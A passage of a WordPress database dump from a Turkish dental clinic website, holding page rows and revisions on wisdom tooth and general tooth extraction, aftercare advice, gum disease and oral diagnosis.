enfeksiyona yatkın zemin her seferinde kolayca enfekte olmaya adaydır. (Bakınız, Dişeti hastalıkları)\r\n\r\n<strong>BASINÇ AĞRISI:</strong> Sürme sırasında komşu dişlere de basınç uygulanıyorsa sıkışmadan dolayı da bir ağrı hissedilebilir. Bazı durumlarda bu basınç aşınmaya yol açar.\r\n\r\n<strong>ORTODONTİK SEBEPLER:</strong> Pek çok genç birey dişlerindeki çapraşıklıkları düzeltmek için ortodontik tedavi görmektedir. Yirmi yaş dişlerinin sürme basınçları diğer dişlere de yansıyacağından diğer dişlerde de bir hareketlilik olur, çapraşıklıklar artabilir.\r\n\r\n<strong>PROTEZLE İLGİLİ SEBEPLER:</strong> Protez planlaması yapılan bir ağızda yirmilik dişleri hesaba katmak gerekir. Çünkü, yirmilik diş çekildikten sonra değişen ağız yapısına göre yeni bir protez yapmak gerekecektir.\r\n\r\n<strong>KİST OLUŞUMU:</strong> Gömük bir dişin sebep olduğu kistik vakalar gözlenmiştir. Kist kemik yıkımına, çene genişlemesine ve çevredeki dişlerin yer değiştirmesine ya da zarar görmesine sebep olur. Kemik yıkımını önlemek için diş çekilmeli ve kist temizlenmelidir. Nadiren bu kist çok geniş alanlara yayılırsa tümörlere dönüşebilir veya çene kemiğinde kendiliğinden kırılmalara yol açabilir.\r\n\r\n20 lik dişlerin çıkarılması için en uygun zaman 17 yaş civarıdır. Çünkü bu senelerde bu diş yeni oluşmaya başlamış, kemik yetişkinlerdeki gibi sert olmadığı için ameliyatı kolaydır. Dişlerin kökleri tam olarak oluşmadığı için de iyileşme daha hızlı olacaktır.\r\n\r\n<strong>20’lik dişin çekim aşamaları</strong>\r\n20 lik diş ameliyatı dişsel ve genel sağlık durumunuzun değerlendirilmesiyle başlar. Dişi rahat bi şekilde değerlendirebilmek için genellikle röntgen alınır. Dişin durumuna göre büyük bir film, küçük bir film veya dijital bir film alınabilir. Diş ameliyatı genellikle diş hekimi muayenehanesinde yapılan bir işlemdir ancak çok komplike durumlarda ameliyatın çene cerrahı tarafından ameliyathane şartlarında yapılması uygun görülebilir. Ameliyatın tipi ve süresi tamamen dişin durumuna pozisyonuna bağlıdır. Genellikle işlem yarım saat ile birbuçuk saat arasında sürmektedir.\r\n\r\nAmeliyattan 8 saat öncesine kadar bişey yiyip içmemeniz tavsiye edilir. İlk yapılacak işlem bölgenin uyuşturulmasıdır. Tam olarak diş ve etraf doku hissizleştiği zaman doktorunuz çalışmaya başlayacaktır. Kullanılacak yöntem dişin gömülü yada sürmüş olmasına bağlı olarak değişir.\r\n\r\nEğer dişiniz büyük oranda sürmüşse sadece davye vasıtasıyla alınabilir. Kökler kemiğin içinde ayrık pozisyonda ve diş kemik içinde derinde ise; dişi parçalara ayırmak veya kemik kaldırmak gerekebilir.\r\n\r\nDişiniz gömülü ise dişe ulaşmak için dişetinde bir kesim yapılır. Dişeti ekarte edilir kemik ortaya çıkarılır. Diş kemiğin de içinde ise bir miktar kemik kaldırılır. Diş iyice ortaya çıkarılıp rahat bir çalışma alanı oluşturulduktan sonra diş bazen tek parça bazen de birkaç parçaya bölünerek çıkarılır.\r\n\r\n<strong>20’lik diş çekimi sonrası için tavsiyeler</strong>\r\n\r\n20’lik diş ameliyatı sonrasında bir süre gözlem altında tutulacaksınız. Kendinizi daha iyi hissettiğinizde doktorunuzun da onayıyla eve gidebilirsiniz. Genellikle ameliyatı takiben birkaç gün istirahat etmeniz uygundur. Ameliyat sonrası kontrol seansları gerekebilir. Kontrole geldiğinizde çekim boşluğunun nasıl iyileştiğine bakılır, varsa dikişler alınır, ağız sağlığınızın durumu değerlendirilir. Çekim sonrasında dikkat edilmesi gereken önemli detayların sıralamak gerekirse;\r\n<ul>\r\n 	<li>Çekimden sonra bir miktar kanama mutlaka olacaktır endişelenmeyin. Ağız içi yaralar çok hızlı iyileşir. Bunun sebebi vücudun o bölgeye fazlaca kan pompalamasıdır. Diş çekiminden sonra kanama olmasının sebebi de budur. Kanama olmazsa pıhtı oluşmaz, pıhtı oluşmazsa çekim boşluğu kapanamaz. Ağzınızı sık sık çalkalamanız ya da kanı sürekli tükürmeniz kan pıhtısını bozacaktır bunları yapmamaya dikkat edin ve kanı mümkün olduğunca yutmaya çalışın.</li>\r\n 	<li>Diş çekildikten sonra doktorunuz kanamayı durdurmak için bölgeye steril bir tampon yerleştirir. Bu tamponu 45 – 60 dakika ısırmalısınız. Kanama hala devam ediyorsa ikinci bir tamponu aynı süre için koyabilirsiniz.</li>\r\n 	<li>Anestezi etkisini kaybedene kadar uyuşmuş dil ve dudağı ısırmamaya dikkat edin.</li>\r\n 	<li>Ameliyattan hemen sonra çekim boşluğu içinde pıhtı oluşacağını söylemiştik. Yaklaşık 2 gün sonra da yumuşak doku (diş eti) çekim boşluğunun üzerini kapatmaya başlar. Sonraki aşama kemik oluşumudur; 2-3 ay içerisinde boşluk kemikle dolacaktır.</li>\r\n 	<li>Çekimden sonra 2 saat hiçbir şey yememeli ve içmemelisiniz. 2 gün boyunca sıcak gıdalar ve içecekler tüketmemelisiniz. Yara tam olarak iyileşene kadar yumuşak gıdalar tüketmeli, bol bol su içmelisiniz. İçecekleri pipetle içmemeli, karbonhidratlı içecekler ve alkol almamalısınız.</li>\r\n 	<li>Diş çekimi sonrası görülen en yaygın problem; çekim bölgesinde birkaç gün içinde başlayan ağrılardır. Bunu engellemek için çekim sonrası uyarılar kesinlikle dikkate alınmalıdır. Çekimden sonra hafif bir ağrı normaldir anestezi etkisi geçmeden aspirin harici bir ağrı kesici kullanabilirsiniz.</li>\r\n 	<li>Çekim sonrası antibiyotik, ağrı kesici veya gargara reçete edilmişse düzenli olarak kullanmalısınız.</li>\r\n 	<li>Gargara yapmak yaranın iyileşmesini hızlandıracaktır. Herhangi bir gargara reçete edilmediyse ılık tuzlu suyla gargara yapabilirsiniz. Gargarayı, 1 bardak suya 1 tatlı kaşığı tuz ekleyerek hazırlayabilirsiniz.</li>\r\n 	<li>Sigara içmeniz yara iyileşme sürecini bozacağından 24 saat boyunca kesinlikle sigara içmemelisiniz. Tavsiye edilen 3 gün sigara içmemektir. Ayrıca ilk gün mümkün olduğunca ağır fiziksel aktivitelerden kaçınmalısınız.</li>\r\n 	<li>Dikiş atıldıysa 1 hafta sonra dikişlerinizi aldırmalısınız. Zor çekimleri takiben şişliği önlemek için ilk 24 saat bölgeye 20 dakikalık aralıklarla soğuk uygulamayı unutmayın. 24 saatten sonra ise sıcak uygulayın. Genellikle şişlik 48 saat sürer.</li>\r\n 	<li>Çekim bölgesi hariç diğer dişleri düzenli fırçalamaya devam edin. 24 saat sonra çekim bölgesini de kibarca fırçalamaya başlayın.</li>\r\n 	<li>Dilinize takılan kemik kenarlarını kök zannedebilirsiniz ama endişelenmeyin, kliniğimizde hiçbir zaman çekim sonrası kök bırakılmaz. Çekim bittikten sonra doktorunuz tüm diş köklerini size gösterecektir. Aklınıza takılan soruları sormakta tereddüt etmeyin.</li>\r\n</ul>\r\nHerhangi bir rahatsızlığınızda lütfen bize danışın.[/vc_column_text][/vc_column][/vc_row]', '20 Yaş Diş Çekimleri', '', 'inherit', 'closed', 'closed', '', '6397-revision-v1', '', '', '2018-07-16 14:13:02', '2018-07-16 11:13:02', '', 6397, 'http://www.ze-dent.com/6397-revision-v1/', 0, 'revision', '', 0),
(6400, 1, '2018-07-16 14:24:56', '2018-07-16 11:24:56', '[vc_row][vc_column][vc_column_text]<strong>Diş Çekimi</strong>\r\n\r\nGünümüzde, bilimsel/teknolojik ilerlemenin diş hekimliği bilimine katkıları sayesinde, öncelikle dişi tedavi etmek ve ağızda tutmak hedeflenmektedir. Ancak bazen hasta sağlığını koruma veya tedavi planlaması nedeniyle diş çekimine başvurulmaktadır. Bu durumları şöyle sıralayabiliriz:\r\n<ul>\r\n 	<li>İleri derecede çürük ve madde kaybı yüzünden tedaviyle kurtarılamayan dişler,</li>\r\n 	<li>Çarpma sonucu, tedavisi mümkün olmayacak şekilde kırılan dişler,</li>\r\n 	<li>Kanal tedavisine rağmen kurtarılamayan apseli dişler,</li>\r\n 	<li>İleri derecede dişeti iltihabı nedeniyle sallanan dişler,</li>\r\n 	<li>Zamanında düşmeyen süt dişler,</li>\r\n 	<li>Aşırı konum değişikliği (dönme, devrilme vb.) nedeniyle sorun yaratan dişler,</li>\r\n 	<li>Kist ya da tümör içindeki dişler,</li>\r\n 	<li>Tam sürememiş (gömülü) ve sorun yaratan dişler…</li>\r\n</ul>\r\nAyrıca ortodontik tedaviye yardımcı olmak amacıyla, yer darlığı nedeniyle sorunsuz olduğu halde bazı dişler çekilebilir.\r\n\r\n<strong>Diş çekimi-kuvvet ilişkisi</strong>\r\n\r\nÇekim sırasında elbette bir kuvvet uygulanır. Ancak çekim aletleri zaten hekimin uyguladığı kuvveti birkaç katına çıkaracak şekilde tasarlandığından, aşırı kuvvet olumsuz sonuçlar bile doğurabilir. Dolayısıyla diş çekimi daha ziyade, teknik bilgi ve beceri gerektiren bir girişimdir. Birçok çene cerrahının bayan olduğu unutulmamalıdır.\r\n\r\n<strong>Diş çekimi korkusunu yenmenin yolları</strong>\r\n\r\nDiş çekimi korkusunun hiçbir şekilde giderilemeyeceğinin anlaşıldığı özel durumlarda, genel anestezi altında çekim yapılabilir. Ancak çoğunlukla hasta ile hekim arasındaki diyalog ve yaklaşım böyle bir girişimin gerekmediğini göstermektedir. Öncelikle çekilmesi gereken dişin vücuda verdiği zararlar ve ağrı gibi olumsuzluklar göz önüne alınarak, bundan kurtulmak gerektiği hatırlanmalıdır. İyi bir uyuşma sağlandıktan sonra, çekim sırasında, sadece bir basınç hissi ve dişin yükselmesi sırasında küçük çıtırtılar duyulabilir. Ağrı ya da acı olmaması gerekir. Genellikle insanlar çevrelerindekileri korkutmayı severler ve bu basınç ile çıtırtıları abartarak anlatırlar. Bu tür yanlış telkinlerin etkisinde kalınmamalı, her türlü soru hekime yöneltilmelidir.\r\n\r\n<strong>Diş Çekimi Sırasında Oluşabilecek Komplikasyon Sebepleri</strong>\r\n<ul>\r\n 	<li>Özellikle büyük azılarda yani çok köklü dişlerde, kökler çok ayrık ya da kıvrık olduğunda,</li>\r\n 	<li>Kemiğin elastikiyetini kaybettiği yaşlı kişilerde,</li>\r\n 	<li>Yine esnemeyen çok kalın çene kemiğine sahip olan kimselerde,</li>\r\n 	<li>Aşırı madde kaybı nedeniyle tutacak yeri azalmış ve kırılganlaşmış dişlerde çekim sırasında kırılma olabilir.\r\nBu korkulacak bir durum değildir. Anestezi, yani uyuşma başarıyla sağlanmışsa, diş hekimi bu iş için üretilmiş aletlerle, kalan parçaları acısız bir şekilde çıkartır.</li>\r\n</ul>\r\n<strong>Diş çekiminden sonra dikkat edilmesi gerekenler</strong>\r\n<ul>\r\n 	<li>Çekim yarasının üzerine konan tampon yarım saat kadar tutulmalıdır.</li>\r\n 	<li>Bu tampon atıldıktan sonra, gerekmiyorsa tekrar tampon konmamalı, oluşan pıhtının bozulmamasına özen gösterilmelidir.</li>\r\n 	<li>Ağız suyla çalkalanmamalıdır.</li>\r\n 	<li>Çekim sonrası iki saat kadar bir şey yenmemeli, bu süre dolduktan sonra da mutlaka ılık şeyler tercih edilmeli, çok sıcak ya da soğuk yiyeceklerden uzak durulmalıdır.</li>\r\n 	<li>24 saat sigara içilmemelidir. Sigara pıhtının bozulmasına ve yara yerinin iltihaplanmasına neden olabilir. ‘Kuru soket’ denen bu durum uzun süre ağrıya sebep olur.</li>\r\n 	<li>24 saat alkol alınmamalıdır.</li>\r\n 	<li>Hiçbir şekilde çekim yerine dokunulmamalı, yara bölgesi emilip tükürülmemelidir.</li>\r\n 	<li>Yaralı bölge 24 saat kullanılmamalıdır.</li>\r\n 	<li>Ağrı olursa aspirin dışında bir ilaç tercih edilmeli, mümkünse bunun için hekime danışılmalıdır.</li>\r\n 	<li>Çekim yeri mutlaka temiz tutulmalıdır. Yara içerisine yemek artığı dolması önlenmelidir.</li>\r\n 	<li>Çekimden 24 saat sonra, yumuşak bir diş fırçasıyla bölge yavaşça fırçalanmalıdır. Bu sırada ılık tuzlu su gargarasından faydalanılabilir.</li>\r\n 	<li>Kanamanın hafif bir sızıntı halinde 6-24 saat sürmesi normal kabul edilmektedir. Ancak aşırı bir kanama varsa ya da bu süre aşılmışsa mutlaka diş hekimine başvurulması gerekmektedir.</li>\r\n 	<li>Aynı şekilde, uzun süren ağrı veya şişlik durumlarında da hekime haber verilmelidir.</li>\r\n</ul>\r\n<strong>Yara iyileştikten sonra yapılması gerekenler</strong>\r\n\r\nÇekim boşluğunun yerine, duruma göre, köprü, protez ya da implant uygulanmalıdır. Çünkü diş eksikliği sindirim bozukluklarına yol açabileceği gibi, çekilen dişe komşu olan dişlerde konum bozuklukları (eğilme, devrilme vb.) ve buna bağlı olarak çiğneme sorunları oluşabilmektedir.\r\n\r\n<strong>Gömülü diş</strong>\r\n\r\nDiş etrafındaki çene kemiğinin çok yoğun veya dişetinin çok kalın olduğu durumlarda, çene kavsinin dar olması nedeniyle dişin sürecek yer bulamaması halinde, süt dişlerinin erken kaybı sonucunda ya da bazı hastalıklara bağlı olarak dişetinin altında, kemik içinde kalmış dişlere ‘gömülü diş’ denir. Bu dişler apseye neden oluyorsa, ağrı yapıyorsa, tümör ya da kist ile birlikteyse ve komşu dişin çürümesine yol açıyorsa, ayrıca dişin büyüklüğü ve konumu çene kırığı riski taşıyacak kadar kemiğin incelmesine neden oluyorsa çekilmesi gerekir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Çekimi', '', 'publish', 'closed', 'closed', '', 'dis-cekimi', '', '', '2018-07-18 20:59:57', '2018-07-18 17:59:57', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6400', 0, 'us_portfolio', '', 0),
(6401, 1, '2018-07-16 14:24:34', '2018-07-16 11:24:34', '', 'dis-cekimi', '', 'inherit', 'closed', 'closed', '', 'dis-cekimi', '', '', '2018-07-16 14:24:34', '2018-07-16 11:24:34', '', 6400, 'http://www.ze-dent.com/wp-content/uploads/2018/07/dis-cekimi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6402, 1, '2018-07-16 14:24:56', '2018-07-16 11:24:56', '[vc_row][vc_column][vc_column_text]<strong>Diş Çekimi</strong>\r\n\r\nGünümüzde, bilimsel/teknolojik ilerlemenin diş hekimliği bilimine katkıları sayesinde, öncelikle dişi tedavi etmek ve ağızda tutmak hedeflenmektedir. Ancak bazen hasta sağlığını koruma veya tedavi planlaması nedeniyle diş çekimine başvurulmaktadır. Bu durumları şöyle sıralayabiliriz:\r\n<ul>\r\n 	<li>İleri derecede çürük ve madde kaybı yüzünden tedaviyle kurtarılamayan dişler,</li>\r\n 	<li>Çarpma sonucu, tedavisi mümkün olmayacak şekilde kırılan dişler,</li>\r\n 	<li>Kanal tedavisine rağmen kurtarılamayan apseli dişler,</li>\r\n 	<li>İleri derecede dişeti iltihabı nedeniyle sallanan dişler,</li>\r\n 	<li>Zamanında düşmeyen süt dişler,</li>\r\n 	<li>Aşırı konum değişikliği (dönme, devrilme vb.) nedeniyle sorun yaratan dişler,</li>\r\n 	<li>Kist ya da tümör içindeki dişler,</li>\r\n 	<li>Tam sürememiş (gömük) ve sorun yaratan dişler…</li>\r\n</ul>\r\nAyrıca ortodontik tedaviye yardımcı olmak amacıyla, yer darlığı nedeniyle sorunsuz olduğu halde bazı dişler çekilebilir.\r\n\r\n<strong>Diş çekimi-kuvvet ilişkisi</strong>\r\n\r\nÇekim sırasında elbette bir kuvvet uygulanır. Ancak çekim aletleri zaten hekimin uyguladığı kuvveti birkaç katına çıkaracak şekilde tasarlandığından, aşırı kuvvet olumsuz sonuçlar bile doğurabilir. Dolayısıyla diş çekimi daha ziyade, teknik bilgi ve beceri gerektiren bir girişimdir. Birçok çene cerrahının bayan olduğu unutulmamalıdır.\r\n\r\n<strong>Diş çekimi korkusunu yenmenin yolları</strong>\r\n\r\nDiş çekimi korkusunun hiçbir şekilde giderilemeyeceğinin anlaşıldığı özel durumlarda, genel anestezi altında çekim yapılabilir. Ancak çoğunlukla hasta ile hekim arasındaki diyalog ve yaklaşım böyle bir girişimin gerekmediğini göstermektedir. Öncelikle çekilmesi gereken dişin vücuda verdiği zararlar ve ağrı gibi olumsuzluklar göz önüne alınarak, bundan kurtulmak gerektiği hatırlanmalıdır. İyi bir uyuşma sağlandıktan sonra, çekim sırasında, sadece bir basınç hissi ve dişin yükselmesi sırasında küçük çıtırtılar duyulabilir. Ağrı ya da acı olmaması gerekir. Genellikle insanlar çevrelerindekileri korkutmayı severler ve bu basınç ile çıtırtıları abartarak anlatırlar. Bu tür yanlış telkinlerin etkisinde kalınmamalı, her türlü soru hekime yöneltilmelidir.\r\n\r\n<strong>Diş çekimi öncesi yapılması gereken şeyler</strong>\r\n<ul>\r\n 	<li>Özellikle büyük azılarda yani çok köklü dişlerde, kökler çok ayrık ya da kıvrık olduğunda,</li>\r\n 	<li>Kemiğin elastikiyetini kaybettiği yaşlı kişilerde,</li>\r\n 	<li>Yine esnemeyen çok kalın çene kemiğine sahip olan kimselerde,</li>\r\n 	<li>Aşırı madde kaybı nedeniyle tutacak yeri azalmış ve kırılganlaşmış dişlerde çekim sırasında kırılma olabilir.\r\nBu korkulacak bir durum değildir. Anestezi, yani uyuşma başarıyla sağlanmışsa, diş hekimi bu iş için üretilmiş aletlerle, kalan parçaları acısız bir şekilde çıkartır.</li>\r\n</ul>\r\n<strong>Diş çekiminden sonra dikkat edilmesi gerekenler</strong>\r\n<ul>\r\n 	<li>Çekim yarasının üzerine konan tampon yarım saat kadar tutulmalıdır.</li>\r\n 	<li>Bu tampon atıldıktan sonra, gerekmiyorsa tekrar tampon konmamalı, oluşan pıhtının bozulmamasına özen gösterilmelidir.</li>\r\n 	<li>Ağız suyla çalkalanmamalıdır.</li>\r\n 	<li>Çekim sonrası iki saat kadar bir şey yenmemeli, bu süre dolduktan sonra da mutlaka ılık şeyler tercih edilmeli, çok sıcak ya da soğuk yiyeceklerden uzak durulmalıdır.</li>\r\n 	<li>24 saat sigara içilmemelidir. Sigara pıhtının bozulmasına ve yara yerinin iltihaplanmasına neden olabilir. ‘Kuru soket’ denen bu durum uzun süre ağrıya sebep olur.</li>\r\n 	<li>24 saat alkol alınmamalıdır.</li>\r\n 	<li>Hiçbir şekilde çekim yerine dokunulmamalı, yara bölgesi emilip tükürülmemelidir.</li>\r\n 	<li>Yaralı bölge 24 saat kullanılmamalıdır.</li>\r\n 	<li>Ağrı olursa aspirin dışında bir ilaç tercih edilmeli, mümkünse bunun için hekime danışılmalıdır.</li>\r\n 	<li>Çekim yeri mutlaka temiz tutulmalıdır. Yara içerisine yemek artığı dolması önlenmelidir.</li>\r\n 	<li>Çekimden 24 saat sonra, yumuşak bir diş fırçasıyla bölge yavaşça fırçalanmalıdır. Bu sırada ılık tuzlu su gargarasından faydalanılabilir.</li>\r\n 	<li>Kanamanın hafif bir sızıntı halinde 6-24 saat sürmesi normal kabul edilmektedir. Ancak aşırı bir kanama varsa ya da bu süre aşılmışsa mutlaka diş hekimine başvurulması gerekmektedir.</li>\r\n 	<li>Aynı şekilde, uzun süren ağrı veya şişlik durumlarında da hekime haber verilmelidir.</li>\r\n 	<li>Sızıntı şeklinde devam eden kanamalarda, ıslatılmış bir çay poşeti, gazlı beze sarılarak yara yerine konulabilir. Bu şekilde bir süre tampon yapmak, çayın içindeki bazı maddelerin kan durdurucu özelliği nedeniyle faydalı olabilir.</li>\r\n</ul>\r\n<strong>Yara iyileştikten sonra yapılması gerekenler</strong>\r\n\r\nÇekim boşluğunun yerine, duruma göre, köprü, protez ya da implant uygulanmalıdır. Çünkü diş eksikliği sindirim bozukluklarına yol açabileceği gibi, çekilen dişe komşu olan dişlerde konum bozuklukları (eğilme, devrilme vb.) ve buna bağlı olarak çiğneme sorunları oluşabilmektedir.\r\n\r\n<strong>Gömük diş</strong>\r\n\r\nDiş etrafındaki çene kemiğinin çok yoğun veya dişetinin çok kalın olduğu durumlarda, çene kavsinin dar olması nedeniyle dişin sürecek yer bulamaması halinde, süt dişlerinin erken kaybı sonucunda ya da bazı hastalıklara bağlı olarak dişetinin altında, kemik içinde kalmış dişlere ‘gömük diş’ denir. Bu dişler apseye neden oluyorsa, ağrı yapıyorsa, tümör ya da kist ile birlikteyse ve komşu dişin çürümesine yol açıyorsa, ayrıca dişin büyüklüğü ve konumu çene kırığı riski taşıyacak kadar kemiğin incelmesine neden oluyorsa çekilmesi gerekir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Çekimi', '', 'inherit', 'closed', 'closed', '', '6400-revision-v1', '', '', '2018-07-16 14:24:56', '2018-07-16 11:24:56', '', 6400, 'http://www.ze-dent.com/6400-revision-v1/', 0, 'revision', '', 0),
(6403, 1, '2018-07-16 14:26:27', '2018-07-16 11:26:27', ' ', '', '', 'publish', 'closed', 'closed', '', '6403', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6403', 8, 'nav_menu_item', '', 0),
(6404, 1, '2018-07-16 14:26:27', '2018-07-16 11:26:27', ' ', '', '', 'publish', 'closed', 'closed', '', '6404', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6404', 9, 'nav_menu_item', '', 0),
(6405, 1, '2018-07-16 14:26:27', '2018-07-16 11:26:27', ' ', '', '', 'publish', 'closed', 'closed', '', '6405', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6405', 10, 'nav_menu_item', '', 0),
(6406, 1, '2018-07-16 14:31:38', '2018-07-16 11:31:38', '[vc_row][vc_column][vc_column_text]<strong>Dişeti Hastalıkları (Periodontoloji)</strong>\r\n\r\nPeriodontoloji, dişleri çevreleyen dokular, iltihabi hastalıklar ve bunların tedavisi ile ilgilenen ana bilim dalıdır.\r\n\r\nToplumda yaygın olarak rastlanan periodontal hastalıkların ilk belirtisi; diş etinde kanamadır. Diş eti; kızarık, şiş ve parlak yüzeylidir. Çoğu zaman bu belirtilere, ağız kokusu, diş etinde kaşınma, kanama hissi ve dişlerde hassasiyet de eşlik eder.\r\nPeriodontal hastalıklar, toplumda çocukluktan yaşlılığa kadar her yaşta insanı farklı şiddette etkileyebilmektedir. Çoğu zaman hastanın ağrı gibi bir şikayeti olmadığı için belirti vermeden ilerleyebilmektedir. Hastanın şikayeti olduğunda ise sağlam ve çürüksüz dişler, destek dokulardaki kayıplardan dolayı sallanarak kaybedilmektedir.\r\n\r\n<strong>Diş eti iltihabı (Periodontisis)</strong>\r\n\r\nPeriodontitis; diş ve dişi destekleyen dokuların (periodontal ligament, sement, alveol kemiği) yıkımıyla karakterize iltihapsal bir hastalıktır. Diş eti iltihabı, alveol kemiğine (çene kemiği) kadar ilerlemiştir. Periodontitisin temel nedeni; bakteri plağıdır ve mekanik olarak tedavi edilebilir. Ancak genetik, çevresel ve sistematik faktörler de hastalığın oluşmasında etken olabilir. Sistemik faktörler içinde diabet, kalp damar hastalıkları, epilepsi, down sendromu, AIDS ve kan hastalıkları sayılabilir.\r\n\r\n<strong>Diş eti hastalıklarının (Periodontal) teşhis ve tedavisi</strong>\r\n\r\nDişhekimleri dişetlerinin genel görünümünden şüphelendikleri zaman ‘periodontal sonda’ adı verilen bir alet ile diş ile dişeti arasındaki dişeti cebinin boyunu ölçerler. Ayrıca dişlerin etrafındaki kemik dokusunu değerlendirmek için röntgen filmler alınabilir. Böylece dişeti hastalıkları teşhis edilir.\r\n\r\nPeriodontal tedavinin ana amacı ise umutsuz gibi görünen sağlıksız dişleri ağızda tutmaktır. Hastalığın tipi ve şiddetine göre değişik tedavi yöntemleri uygulanabilir. Bunlar; öncelikle ağız hijyeni eğitimi, diş taşı temizliği, kök yüzeyi düzleştirilmesi, rejeneratif, rekonstrüktif ve mukogingival operasyonlar olarak özetlenebilir. Aynı zamanda yüksek gülme hattı olan bireylerin diş eti estetiğini sağlamak da, periodontal tedavi kapsamındadır. Hastalığın tipi ve şiddeti, hastanın alışkanlıkları, hekimi ile yapacağı işbirliği, ağız hijyeninin standardı, tedavi planlaması ve başarısını doğrudan etkiler.\r\nPeriodontal tedavi, erken teşhis ile gerekli müdahaleler yapıldığında sonuçları kesin ve hasta memnuniyetinin en yüksek oranda olduğu diş hekimliği hizmetidir. Unutulmamalıdır ki; periodontal olarak sağlıklı olmayan dişlere hiçbir restoratif tedavi uygulanamaz.[/vc_column_text][/vc_column][/vc_row]', 'Dişeti Hastalıkları Periodontoloji', '', 'publish', 'closed', 'closed', '', 'diseti-hastaliklari-periodontoloji', '', '', '2018-07-18 20:57:58', '2018-07-18 17:57:58', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6406', 0, 'us_portfolio', '', 0),
(6407, 1, '2018-07-16 14:31:16', '2018-07-16 11:31:16', '', 'agiz-hastaliklari', '', 'inherit', 'closed', 'closed', '', 'agiz-hastaliklari', '', '', '2018-07-16 14:31:16', '2018-07-16 11:31:16', '', 6406, 'http://www.ze-dent.com/wp-content/uploads/2018/07/agiz-hastaliklari.jpg', 0, 'attachment', 'image/jpeg', 0),
(6408, 1, '2018-07-16 14:31:38', '2018-07-16 11:31:38', '[vc_row][vc_column][vc_column_text]<strong>Ağız hastalıkları (Periodontoloji)</strong>\r\n\r\nPeriodontoloji, dişleri çevreleyen dokular, iltihabi hastalıklar ve bunların tedavisi ile ilgilenen ana bilim dalıdır.\r\n\r\nToplumda yaygın olarak rastlanan periodontal hastalıkların ilk belirtisi; diş etinde kanamadır. Diş eti; kızarık, şiş ve parlak yüzeylidir. Çoğu zaman bu belirtilere, ağız kokusu, diş etinde kaşınma, kanama hissi ve dişlerde hassasiyet de eşlik eder.\r\nPeriodontal hastalıklar, toplumda çocukluktan yaşlılığa kadar her yaşta insanı farklı şiddette etkileyebilmektedir. Çoğu zaman hastanın ağrı gibi bir şikayeti olmadığı için belirti vermeden ilerleyebilmektedir. Hastanın şikayeti olduğunda ise sağlam ve çürüksüz dişler, destek dokulardaki kayıplardan dolayı sallanarak kaybedilmektedir.\r\n\r\n<strong>Diş eti iltihabı (Periodontisis)</strong>\r\n\r\nPeriodontitis; diş ve dişi destekleyen dokuların (periodontal ligament, sement, alveol kemiği) yıkımıyla karakterize iltihapsal bir hastalıktır. Diş eti iltihabı, alveol kemiğine (çene kemiği) kadar ilerlemiştir. Periodontitisin temel nedeni; bakteri plağıdır ve mekanik olarak tedavi edilebilir. Ancak genetik, çevresel ve sistematik faktörler de hastalığın oluşmasında etken olabilir. Sistemik faktörler içinde diabet, kalp damar hastalıkları, epilepsi, down sendromu, AIDS ve kan hastalıkları sayılabilir.\r\n\r\n<strong>Diş eti hastalıklarının (Periodontal) teşhis ve tedavisi</strong>\r\n\r\nDişhekimleri dişetlerinin genel görünümünden şüphelendikleri zaman ‘periodontal sonda’ adı verilen bir alet ile diş ile dişeti arasındaki dişeti cebinin boyunu ölçerler. Ayrıca dişlerin etrafındaki kemik dokusunu değerlendirmek için röntgen filmler alınabilir. Böylece dişeti hastalıkları teşhis edilir.\r\n\r\nPeriodontal tedavinin ana amacı ise umutsuz gibi görünen sağlıksız dişleri ağızda tutmaktır. Hastalığın tipi ve şiddetine göre değişik tedavi yöntemleri uygulanabilir. Bunlar; öncelikle ağız hijyeni eğitimi, diş taşı temizliği, kök yüzeyi düzleştirilmesi, rejeneratif, rekonstrüktif ve mukogingival operasyonlar olarak özetlenebilir. Aynı zamanda yüksek gülme hattı olan bireylerin diş eti estetiğini sağlamak da, periodontal tedavi kapsamındadır. Hastalığın tipi ve şiddeti, hastanın alışkanlıkları, hekimi ile yapacağı işbirliği, ağız hijyeninin standardı, tedavi planlaması ve başarısını doğrudan etkiler.\r\nPeriodontal tedavi, erken teşhis ile gerekli müdahaleler yapıldığında sonuçları kesin ve hasta memnuniyetinin en yüksek oranda olduğu diş hekimliği hizmetidir. Unutulmamalıdır ki; periodontal olarak sağlıklı olmayan dişlere hiçbir restoratif tedavi uygulanamaz.[/vc_column_text][/vc_column][/vc_row]', 'Ağız Hastalıkları Periodontoloji', '', 'inherit', 'closed', 'closed', '', '6406-revision-v1', '', '', '2018-07-16 14:31:38', '2018-07-16 11:31:38', '', 6406, 'http://www.ze-dent.com/6406-revision-v1/', 0, 'revision', '', 0),
(6409, 1, '2018-07-16 14:36:04', '2018-07-16 11:36:04', '[vc_row][vc_column][vc_column_text]<strong>Oral Diagnoz</strong>\r\n\r\nOral diagnoz, diş hekimliğinde ağız hastalıkları ile ağızda belirti veren sistemik hastalıkların teşhisi ve tedavi planlamasını üstlenmiş ana bilim dalıdır.\r\n\r\nAğız içinde sadece çürük dişler ve iltihaplı diş etleri bulunmaz. Tüm dünyada kabul edildiği gibi çene kemikleri ve eklemi, tükürük bezleri, dil ve ağız içinde görülen tüm yumuşak doku hastalıkları, diş hekimliğini ilgilendiren konulardır. Bu yapı ve dokular, küçük bir alanı kapsamakla birlikte, anatomik olarak karmaşık bir sistem oluştururlar. Birçok sistemik hastalık da ağız içinde önemli belirtiler göstermektedir. Örneğin, şeker hastalığında diş eti hastalığı çok çabuk ilerler. Yine ağız içinde sık ve çok sayıda çıkan aftlar, behçet hastalığının ilk belirtileri olabilir. İşte bu nedenlerden dolayı ağız içi hastalıklarının teşhisi ve tedavi planlaması ile ilgili ayrı bir ana bilim dalı doğmuş; Oral Diagnoz ve Radyoloji de bu görevi üstlenmiştir.\r\n\r\n<strong>Diş Filmleri (Dental Radyografi)</strong>\r\n\r\nAğız içi hastalıklarının -özellikle diş ve çene kemiği gibi sert doku ile ilgili olanların- teşhisinde en büyük yardımcı, dental radyografiler yani diş filmleridir. Diş filmlerinin de en çok kullanılan 